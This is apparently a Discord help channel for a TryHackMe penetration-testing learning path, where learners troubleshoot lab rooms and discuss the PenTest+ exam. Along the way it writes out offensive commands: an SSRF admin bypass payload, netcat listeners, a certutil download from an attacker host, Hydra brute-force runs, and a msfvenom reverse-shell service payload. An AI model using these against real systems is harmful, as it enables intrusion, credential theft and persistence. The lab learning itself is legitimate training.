That didn't help. What helped: reinstalling ssh client. But thx for your help

Gave +1 Rep to @cosmic pecan

Hi, wanted to know if anybody can tell me how to get to admin area in the SSRF section of the owasp_top10_2021_v1.2 room. Could not figure it out.

Simply change the value of the server to point to your attacking machine, you could just capture the contents of the request using Netcat: nc -lvnp 80

I am not able to run mimikatz.exe in Persisting Active Directory room. When I run, its just get stuck, I tried reseting/starting after sometime, all results in the same issue. Can anyone help me get through this?

[SOLVED] I tried C:\Tools\mimikatz_trunk\x64\mimikatz.exe but didnt work, then tried C:\Tools\mimikatz_trunk\Win32\mimikatz.exe, It worked perfectly

What do you mean by change the value of the server?

As you can see, there is a download functionality in the webpage.. Intercept the request through burp, then click on download. You will be able to see the request in burp.

As you can see the parameter ?server, that points out to a domain. Now we will change the value to our attacking machine's IP address. Before that, we need to run a listener on port 8087 as the website is running on port 8087. Now send the request

Keep hitting forward, now check your terminal. You will receive the flag.

I did that and received the flag. What I mean is the extra challenge after that. Getting into the Admin Area.

apologise for the misunderstanding

so instead of pointing the server parameter to your attacking machine, we are going to point out to the admin page.. so generally admin pages can be accessed using only localhost. So change it to.. http://localhost:8087/admin ..

1. lets try to delete the id parameter and send the request, but we get an error saying file not specified (assume there is a mechanism thats validating id parameter)
2. So lets use '#' before the id parameter.. so it will go like this.. server=http://localhost:8087/admin#&id=something
   This will not consider the part thats after the #.
3. If that still didnt work, lets try to encode the #, assuming that there might be a blacklist..
   encoding # we get %23..
   so the url goes some what like this
   server=http://localhost:8087/admin%23&id=something

This will get the job done..

Try to understand the concepts and the mechanism.. We need to assume the mechanism used at the server side and perform the attacks.

thx for your help. shell i brute force the id. I tried 0 to 10 and always get pdf file encoded.

Gave +1 Rep to @cosmic pecan

You don't have to bruteforce the id parameter. You have to access the admin page.

You will find the flag once you access it

I am solving a lab called Phishing

And I am not getting the password back to answer the Question asked inside the lab.

Did you get it to work at all?

I have closed the machine

should I do it one more time

I'm not sure, I was just going to try it to see if I ran into the same issue as you

Okay
Please Let me know

Ya it worked for me

not to sound stupid, but did you hit refresh (the blue button, not the page refresh) at the top after a bit?

yes

Ya mine gave the password after a min

did you create the phishing email just like in the walkthrough? It said to craft a convincing one, so I wonder what would happen if it wasn't convincing haha

What have you written?

I wrote exactly what was in the walkthrough

Me too

Hmm. Not sure. Maybe try going back through it again. Maybe the server was being weird. I know the page froze once for me, i had to refresh and start over but luckily I was at the first step

I have done it more than 10 times

oh.. well hmm..

yup

If you're able and willing to, you can try screensharing while you do it and we can walk through together to see whats up

Glad we could get it working for you.

Mscteacher

Thank you!!

Gave +1 Rep to @keen dew

Guys, I don't understand, do people actually remember all this stuff? 😮

I barely remember anything from the rooms in this learning path

Ah, I overlooked the Prerequisites: "and have studied the theoretical knowledge in the CompTIA PenTest+ syllabus to complete this pathway."

You don't need to memorize these. Understanding it should be sufficient

Oh okay 🙂

Like a lot of stuff in the Compuitng / Cyber (and any engineering type job) understanding is the key.

Know what to do with the info when you get to it, know where to find it.

Learn it by heart when you got to go do a 100 multi guess Questions for a shiny cert haha.

I'm lost

been googling for the past hour

I googled the error message and found the below -

https://github.com/DanMcInerney/wifijammer/issues/111

Thanks I solved it, i just moved the python file to a different location and it works, no idea why

Gave +1 Rep to @vapid cipher

Repitition helps. For example I took a CEH (certified ethical hacking) course, then started this track while reading the ALL in One book to pass the cert exam. Doing this was a lot easier for me than taking the time to set up a home lab like I am supposed to do. Then I also found an 11hr PT+ video course on YouTube that reviewed some but also covered a LOT I had either missed, forgotten or never really understood. I have not finished the track here yet but I did squeak a pass on the PT+ exam last week so I can say there IS hope if you just stick with it & give it time to sink & --and keep repeating stuff.

Wow great job, and thanks for the motivation! I think I'm going to finish all Learning Paths on THM and then go over all of them again for a refresher

Gave +1 Rep to @wise haven

@fading tartan win some lose some. If you look back at a room & feel like some one else must have done it don't be shy about resetting the room progress & do it again. I just did a ctf over the weekend and way back at the beginning of my ceh labs I did a lab using sysinternals but drew a total blank on it in the heat of the ctf so I missed several flags that "should have" been gimmee's. TL:DR: forgetting stuff is 100% normal. Spaced repitition is one of the best ways to really learn & remember, meaning multiple repititions. Even if you are self study you can use quizlets free inline to review concepts chapter by chapter if you are more used to linear learnig.

OTOH, last year I got exact ONE flag at the same ctf. This year I got over 1000 pts. Not enough to move to the next round but a decent improvement.

Ive gone over windows persistance about 3x to create a writeup for my uni channel (obvs no flags) really enjoying the pathway. Persistence is a beast lol.

Really good advice here. Am pluggin away at PT+ pathway! Really enjoying it.

Ugh getting super stuck on this task in the OWASP top 10 - 2021 module! Can't figure out how to edit the cookies, there doesn't seem to be an option in firefox developer that i can see 😦

Anyone got a tip for me? really don't want to just lookup the answer!

https://tryhackme.com/room/owasptop102021

ugh, finally i found the answer, double click it, there is no right click edit option like other browsers and older versions.

Ikr

I'm having issues with the Breaching Active Directory. Task 4. The rogue LDAP server isn't working.

Anyone with a clue on setting it up correctly? I followed the step as best as I could.

Not on there yet!

Oh well...guess I'll just move on to the next room till i have the patience to figure it out.

I so wish i could do that 🤣🤣🤣 i basically fixate on one till i complete it. Honwstly think this is an obsession 🤣

😂😂💔 I do that too and there's nothing wrong with being fixated on a particular issue till you solve it, but you need to know when you're going in circles and not getting anything done.

Yea i normally go to bed at that point cus id been on a box all night and cockerels calling 🤣
Had a couple days off from here as work is nuts atm. Plus Uni work and kids 🤣

😂 good times. Finally completed the room this morning. On to Linux PE.

Work is thankfully quiet this morning.....so am jumping on now 😁

Good luck...you got this!

on task 6/9 Windows Persistence weird somethings just clicked and realised - hold on im sending / receiving reverse shells to machines and its comfortable. Had a few issues with Tampering with Unprivileged Accounts tbh. It just didnt seeem to click for ages and then it did today and flew through the rest

Great! Have fun 😁 and don't forget that with great power comes great responsibility.

Meh....im only for the light side of the force anyways lol

Id like to be apart of the ones who catch the "other side" lol

LoL yeah, I mean...isn't that what we're learning for?

Dont know get the feeling not everybody is on that side of the fence lol. Disgruntled employees are a big problem!

True that.

Anyways, how far have you gone? Done with Windows persistence?

I finished persistence. May jump on tonight tbh. It was fun in all fairness. Backdoorinng files is a good room

Does anyone know why the provided directory enum python script would give me this error? 'requests' has no attribute 'get'
This is for the Python for Pentesters room

I just did it from my own Kali vm. The AttackBox has a bunch of issues.

I found that on flag 13 of the registry task.
I followed everything to the tee, created a shell (correct LHOST + LPORT) Then sent the shell to the target machine and saved in C:\Windows - then put the filepath in the value of the reg entry - opened a nc listener on the same port as LPORT on the revshell.exe - signed out - reconnected and the shell let me in - travelled to C:\flags and ran the flag13.exe

Sorry it appears you are missing something..... 🤔🤔 it might be the machine itself so will try again today.

Try resseting the target and attack machines it may just be a bad session.

Im going to jump on in 20 mins. Ill let you know how it goes.

It was the previous machine - got the flag first time 🙂

Finished! AD next 👌

Yeah, it is. That part was fun.

Great! I'm occupied so I haven't gone far. Still at Linux PE. Keep me posted on your progress.

Will do.
The Breaching AD room NEEEEEEEDS time.
You have to do the room in one. And if you leave you need to start again 😬 so id set aside a good day for that room to give yourself time to complete and work through any issues.

The breaching room can be done in a day.

Alright.

Yeah, if you don't have other things going.

Hey, quick question on the wireshark section. Finding the aliens name in a text file. I have a text file with an alien image on it but i cant see a name...is this the correct text file? On the question before it was finding the text in packet 12, i followed the instructions had an image and went to the properties, copied in what i thought was the answer but it says incorrect. Any tips for either on these? Thanks

Don't have it in front of me but I think you have to scroll down.

IIRC, you either scroll down, or zoom out.

Maybe zoom out.

Thanks both, i did scroll down and there was a word like master or something in bold but it never had the correct amount of characters for the answer. Ill try again later on and let you know.

Anyone know the password for the Windows server VM CredsharvADV1 in Task 4 - Credential harvesting. Its blank fields for me under 'machine information'

Sorry, im not up to that point yet.

anyone done active reconnaissance yet?

task 6 I can not nc ip 21 at all

anyone had same issue?

Hey guys, can somebody share the comptia pentest+ practice papers ?

it on Cyber Vista

Thank you bro

Gave +1 Rep to @vast vector

anyone done nmap basic port scans taks 5?

there is no new port open. so whats the answer here?

Please help

Still need help?

I have this problem It doesnt accept my answer

Have you tried to retype the second -?

yes I did it and work thank you

can someone help me with governance and regulation in planning and scoping room? It is question 3 in NIST special publications

"Which phase (name) of NIST 800-53 compliance best practices results in correlating identified assets and permissions?" Answer format is 3 characters

i cannot figure it out for the life of me

false alarm i figured it out by rereading

If a AP has 802.11r, is it sure it broadcasts pmkid? If not, how does roaming work without pmkid?

Hello everyone, i was wondering. Is it possible to switch from a Powershell reverse shell to a cmd reverse shell ? If yes any advice on how to do it ? Thanks !

By 'switch', what do you mean exactly?

Hello 🙂 i mean to execute cmd commands from powershell

I am not really sure but on cmd itself you can execute the command named "runas " perhaps in powershell you can switch back to cmd using this

I believe the command is "runas /u:[Current-user] cmd.exe"

You would however need the password for this user

@willow berry

If the syntax is incorrect please google the correct one, I cant remember it out of the top of my head

Can anyone help with THC Hydra on Kali Linux?

What kind of help do you need?

I need help with a brute force attack in DVWA

It Keeps showing all of my passwords as valid

What tool are you using - hydra? And can you share your entire command?

I'm using Hydra

sudo hydra -l admin -P /usr/share/wordlists/rockyou.txt -u -f 127.0.0.0 -s 80 http-get-form "/DVWA/vulnerabilities/brute?:username=^USER^&password=^PASS^:F=<input name='Login'"

This syntax generates data, but it will go for hours (10 or more) and I don't see if the password was found

sudo hydra -l admin -P /usr/share/pswords.txt -u -f 127.0.0.0 -s 80 http-get-form "/DVWA/vulnerabilities/brute?:username=^USER^&password=^PASS^:F=<input name='Login'"

I created my own password list and it comes " 0 valid password found"

You don't need to add -s if the web page is running on port 80. Also, you don't need to add sudo to run hydra.

Are you sure you have the first parameter correctly (as it has ? at the end)? And the third parameter, it usually is for thr error message in case of incorrect login.

let me check

I have been trying several diffent ways to do this

hydra 127.0.0.0 http-post-form "/DVWA/login.php:username=^USER^&password=^PASS^&Login=submit:Login failed" -l unames.txt -P pswords.txt

This one gives me this.....

Hydra v9.5 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2023-11-12 21:18:53
[DATA] max 8 tasks per 1 server, overall 8 tasks, 8 login tries (l:1/p:8), ~1 try per task
[DATA] attacking http-post-form://127.0.0.0:80/DVWA/login.php:username=^USER^&password=^PASS^&Login=submit:Login failed
[80][http-post-form] host: 127.0.0.0 login: unames.txt password: Heroes
[80][http-post-form] host: 127.0.0.0 login: unames.txt password: password
[80][http-post-form] host: 127.0.0.0 login: unames.txt password: Password
[80][http-post-form] host: 127.0.0.0 login: unames.txt password: pass12345
[80][http-post-form] host: 127.0.0.0 login: unames.txt password: Save the Cheerleader
[80][http-post-form] host: 127.0.0.0 login: unames.txt password: Timex
[80][http-post-form] host: 127.0.0.0 login: unames.txt password: Boom
[80][http-post-form] host: 127.0.0.0 login: unames.txt password: Stealing Powers
1 of 1 target successfully completed, 8 valid passwords found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2023-11-12 21:18:54

Here is what I have from Burpsuite......

POST /DVWA/login.php HTTP/1.1

Host: 127.0.0.0

User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8

Accept-Language: en-US,en;q=0.5

Accept-Encoding: gzip, deflate

Content-Type: application/x-www-form-urlencoded

Content-Length: 83

Origin: http://127.0.0.0

Connection: close

Referer: http://127.0.0.0/DVWA/login.php

Cookie: PHPSESSID=dh1h9ohncir26mhrr7p7f895aj; security=low

Upgrade-Insecure-Requests: 1

Sec-Fetch-Dest: document

Sec-Fetch-Mode: navigate

Sec-Fetch-Site: same-origin

Sec-Fetch-User: ?1

username=test&password=test&Login=Login&user_token=c06a3c7a4cee9d107f935c3c1f7e623e

You need to supply -l or -p if you are providing a name anf password, otherwise -L and -P will take a list and iterate using a combination of each.

If you are providing a list, make sure you provide the full or relative path, unless you are running hydra on the folder or directory where you have the user and password list.

I tried that to and it made all of my passwords valid

i had hydra -L /usr/share/unames.txt -P /usr/share/pswords.txt ........

It is due to one of your parameters being incorrect.

gotcha

I'm just not sure which one

hydra 127.0.0.0 http-post-form "/DVWA/login.php:username=^USER^&password=^PASS^&Login=submit:Login failed" -l /usr/share/unames.txt -P /usr/share/pswords.txt

I just ran that one

You can refer to this to help you -

https://infinitelogins.com/2020/02/22/how-to-brute-force-websites-using-hydra/

I'll check it out

You still having issues with hydra ? When the entire word list comes back valid it's usually because the failed login response is incorrect. What room are you in ?

Hi guys, I'm starting the Linux Privilege Escalation chapter and I'm trying to SSH to the Enumeration machine in Task 3 but the connection is hanging at debug1: SSH2_MSG_KEXINIT sent. Pinging the IP is successful. Any ideas?

Can you try adding -vv in your SSH command?

Yes that is how I saw the error to begin with 😅

Can you provide the link to the room as there are at least 4 Linux Priv Escalation rooms?

https://tryhackme.com/room/linprivesc

https://unix.stackexchange.com/questions/758893/ssh-connection-stop-at-debug1-ssh2-msg-kexinit-sent

#room-help message

Thanks yeah I saw this same post earlier and tried running the dpkg-reconfigure command suggested in the first answer but it didn't seem to work.

I figured I'd check to see if I could connect to another THM box via SSH so I ran ssh -vv thm@THMJMP1.za.tryhackme.com in the Breaching AD room which I did yesterday and it is working and not seeing any visible differences in the debug info leading up to sending of the key exchange init.

You suggest moving the conversation over to that channel?

No, if you click on that, it will point you to the command you need to run to possibly resolve your issue.

Ok thanks, having a look now.

@vapid cipher lol it worked 🙌

Thanks for your help. I will be sure to check that channel if I ever run into anything like that again!

Just do a search on MTU across the discord and it should work.

Iam not sure Iam in the right room but, I have an issue, Iam doin the breaching AD room, and when I try to password spray its just not working, Error:
equests.exceptions.ConnectionError: HTTPConnectionPool(host='ntlmauth.za.tryhackme.com', port=80): Max retries exceeded with url: / (Caused by NewConnectionError('<urllib3.connection.HTTPConnection object at 0x7f805ddc4b38>: Failed to establish a new connection: [Errno -2] Name or service not known',))

I'm stumped. In rooms like Persisting Active Directory where you have to connect to the Persistingad network, I can't get nslookup thmdc.za.tryhackme.loc(or .com) to work.
Results: nslookup thmdc.za.tryhackme.loc
Server: 127.0.0.53
Address: 127.0.0.53#53

** server can't find thmdc.za.tryhackme.loc: NXDOMAIN

I got it to work on one of my Kali boxes on my laptop but not on my desktop. I tried to Google and GPT for help but I'm at a complete loss

Have you tried posting this in the #persisting-ad channel? You might get more feedback in there.

does any one how much Governance & Regulation is on the exam?

Have you referred to the exam syllabus?

not yet, do you have it?

It should be available in the CompTIA site.

ok thank you

https://www.google.com/url?sa=t&source=web&rct=j&opi=89978449&url=https://partners.comptia.org/docs/default-source/resources/comptia-pentest-pt0-002-exam-objectives-(4-0)&ved=2ahUKEwivrK6v-rCDAxWXklYBHafzAxQQFnoECBQQAQ&usg=AOvVaw2gqijOx8cMGTEWi2BwRazY

hello, I am doing Windows- Lateral Movement and Pivoting-Abusing User Behaviour . I cannot get the credentials at http://distributor.za.tryhackme.com/creds_t2 to start the task. The network state is running and started. openvpn is on. Had no issues connected with the network until now. Cant connect to server...

Are you using the correct openvpn profile for the network? And did you add the IP address of THMDC to your dns server config? Oh, seems you've been able to connect up till now.. You might want to wait for the network to time out and go into Stopped state. Then Start the network fresh.

I went through this two days ago btw.

Hello, I'm having trouble in Credentials Harvesting. In Task 4, we are supposed to be able to move SAM and SYSTEM from the windows machine to Attack-box. Instructions say SCP should work. But I keep getting Permission Denied on my SCP command. I'm using the same credentials that I'm using to RDP to the VM.

cant even get the credentials from
http://distributor.za.tryhackme.loc/creds

Requesting Your Credentials

To simulate an AD breach, you will be provided with your first set of AD credentials. Once your networking setup has been completed, on your Attack Box, navigate to http://distributor.za.tryhackme.loc/creds to request your credential pair. Click the "Get Credentials" button to receive your credential pair that can be used for initial access.

so assume network needs ressetting

Which room/subnet?

I'm having similar issues with the Lateral Movement room, openvpn was working until this morning and now getting ERROR: Cannot ioctl TUNSETIFF lateralmovement: Device or resource busy (errno=16) tried using the attackbox, I can ssh into the jumpbox, but connection gets reset after about 10 secs and its super slow for that 10secs

hello champs

You can do this within the AttachBox after running the systemd-resolve command to enable DNS

how long does it take for Lateral Movement and Pivoting room network to reset?

Hello

hi, https://tryhackme.com/room/nmap01 the answers to the questions of task 7 are wrong.

Which question?

the accepted answers to the first two questions are reversed

Windows Local Persistence > Task 4

Running THMservice says: The service did not respond to the start or control request in a timely fashion.

Running THMservice2 says: The file or directory is corrupted and unreadable.

If I remember this one, I read that you'll have to complete it from the first one all the way to the end so you can't stop mid way and simply continue the remaining ones on the following day or session.

So i guess a few weeks won't work either

Yeah, you gotta do it in one continuous session.

right, thanks man

Gave +1 Rep to @vapid cipher (current: #17 - 404)

I'm having an issue with the lateral movement and pivoting room. I am starting attack box inside the room and the network is up, but my attackbox apparently isnt on the same network as the room. I can't ping the DC and, understandably, when I run the command to configure the DNS I get the error "Unknown interface lateralmovement: No such device" is there a way to fix this or am i missing something?

Hi people, before moving to the Pentest+ path which paths should i have completed? Junior Pentester?

There is a recommended path here in the discord. Let me look for it.

#general message

Thank you

Thank @true frigate instead as its her recommendation.

Gave +1 Rep to @plucky vector (current: #2004 - 1)

haha

I'm doing the WIndows Local Persistence room right now, and in Task 4 i need to copy a payload to the windows machine. i tried a python webserver but the wget just shows "number of bytes read: 0"
so i tried to setup an smbshare to access the file which i can access from the windows machine, but the file doesn't get copied... running out of ideas anybody has a suggestion what i can try?

try certutil

how 😄 i never used it before

certutil -urlcache -split -f http://10.x.x.x:8000/path/to/your/file output_filename

otherwise just google it

thanks, will give it a try

Gave +1 Rep to @true frigate (current: #4 - 1649)

alternatively if your shell is powershell the wget command should work but you will need to specify the -O output_file for it to work as it is a alias to invoke-webrequest in windows

yeah i know. kinda strange the certutil executes completely but the created file is 0 bytes... not sure what i am missing.

are you specifying the right port

are you specifying the right ip

and the correct path for the file hosted using python -m http.server

yeah, also tried now scp file is found but doesn't copy at all just stays at 0 bytes.

can't even rdp into the machine. seems strange i think i'll grab something to eat and try again afterwards with a new machine.

or try the attackbox instead of my vm

@true frigate not sure why but from the attack box it worked without any problems. just wanted to let you know, got distracted before and tried just now.

I was following this step from Exploitation AD room and ran the mimikatz.exe from x64 and it throws this error. How can i fix thiss issue? please help me . I'm stuck at here

.\mimikatz.exe

Program 'mimikatz.exe' failed to run: The specified executable is not a valid application for this OS platform.At line:1 char:1

• .\mimikatz.exe

At line:1 char:1

• .\mimikatz.exe

• 
    + CategoryInfo          : ResourceUnavailable: (:) [], ApplicationFailedException
  
    + FullyQualifiedErrorId : NativeCommandFailed

I am forgot in exploitAD or on other AD chall but i have the same error like you and try the 32bit and it’s run .

tysm bro
I ran 32bits too and thought it didn't work well. But now it worked somehow.

Hello!
Is there anyone who can help my why I can't delete SD registry in the WindowsLocalPersistent module Task 5, I have followed the instructions yet i get this error.

NCIIPC-AICTE with Government of India is organizing a Pentathon{Penetration Testing Hackathon} whose CTF Round 1 is going to start in next 1hr before midnight 12 and we need a partner who is familiar with CTF.He should be in a College(India) and college should be affilated to AICTE. Please don't hesitate to give me a call we are running out of time

https://www.comptia.org/certifications/pentest

Beta exam registration starts on May 24

Are there any requirements? I'd do it just for fun

No requirements. I'm doing SecurityX "CASP+" and Pentest+. I'm planning on passing the Pentest+ and just doing SecurityX for the experience.

SecurityX? That's new

Yes, the new name of the CASP+

I see. So that should renew sec+ and net+ unless rules changed as well

Yes, it will.

I might be hanging over here while I study using the path in THM. I hope I get to see you around.

Please vote for the resetting of AD network. It ain't workin' as expected

You can also give 1 vote for every hour I think.

No. 1 vote per paid THM user

No, one vote per hour for each user.

You can add 5 votes over 5 hours.

Des français pour faire du hacking ensemble ?

hi, English only this server please.

PenTest+ is a serious exam --- I passed the 1st time out --- you gotta get serious in organizing your notes, study questions, and frame of mind ... there is alot of situational questions that only an experienced pen tester would know ... always deduct down to 2 possible answers and really ask yourself which is correct by analyzing the question being asked ...

I'm taking the exam Monday. Any more wisdom you'd be willing to share?

good day am a newbies into pen-testing pls can someone give guidlines to follow on how i can i be a pen-tester also some necessary lesson i should take

also is the any necnecessary programming language i should learn

Do visit the #start-here channel.

Good luck, let me know how it goes.

How did it go?

Passed with 796

Congratulations 🎊 🎉

This is good news. I'm taking my exam in a couple of months! What would you rate Dioin training and THM training for Pentest+?

Posted my full experience here: https://www.reddit.com/r/CompTIA/comments/1d7fv3x/passed_the_pentest_pt0002_exam/
But the short version is that THM is great for hands on learning, especially the Nmap rooms because of how prevelant they are in the actual exam. I watched the Dion videos, but I was already about halfway through two study guides at that point, so it was a lot of review for me. I couldn't accurately say how well they work as a primary resources. If you're using Dion's 6 practice exams, those are awesome!

Hey is there anyone out for help? I'm having confusion in Attacks and Exploits > Lateral Movement and Pivoting > Task 3 > Let's Get to Work!

If the creds of target user's already given. Can't we simply SSH into it rather than complicating things like what's mentioned

Did you pass

#pentest-plus-path message

steelmountain lab manual exploitation is not working. is't a bug or what ??

In which part are you? Are you using your VM or Attackbox?

@vapid cipher i'm at manual exploitation phase tried both VM and attackbox

exploit provided on tryhackme is not working i had to find new one https://www.exploit-db.com/exploits/49584 than only i was able to take reverse shell but not able to escalate to administrator

For which room?

Steel Mountain

Oh. that's common,

Oh.. the unquoted service path?

yes

Steel Mountain isn't in this path, which is why I was confused.

You generated the payload using msfvenom?

yes

Got the correct architecture?

system was 64bit

but i used the THM recommended msfvenom shell : msfvenom -p windows/shell_reverse_tcp LHOST=10.10.12.249 LPORT=4443 -e x86/shikata_ga_nai -f exe-service -o Advanced.exe

In which directory did you placed the payload?

Advanced SystemCare

later i was not able to stop the service AdvancedSystemCareService9

by sc stop AdvancedSystemCareService9

did you completed this lab if completed than when ??

i just want to know if there something wrong with this lab itself or something else

Its been months.. but definitely during the earlier part of the year, but got it working.

Aahh.. this is the reason why you can't run the exploit correctly. You need to stop and start the service to get the shell.

Do check the Sushant Windows privilege escalation cheat sheet if the steps listed there for unquoted service path (stopping and starting a service) would work.

Where can we have a cheat sheet Please?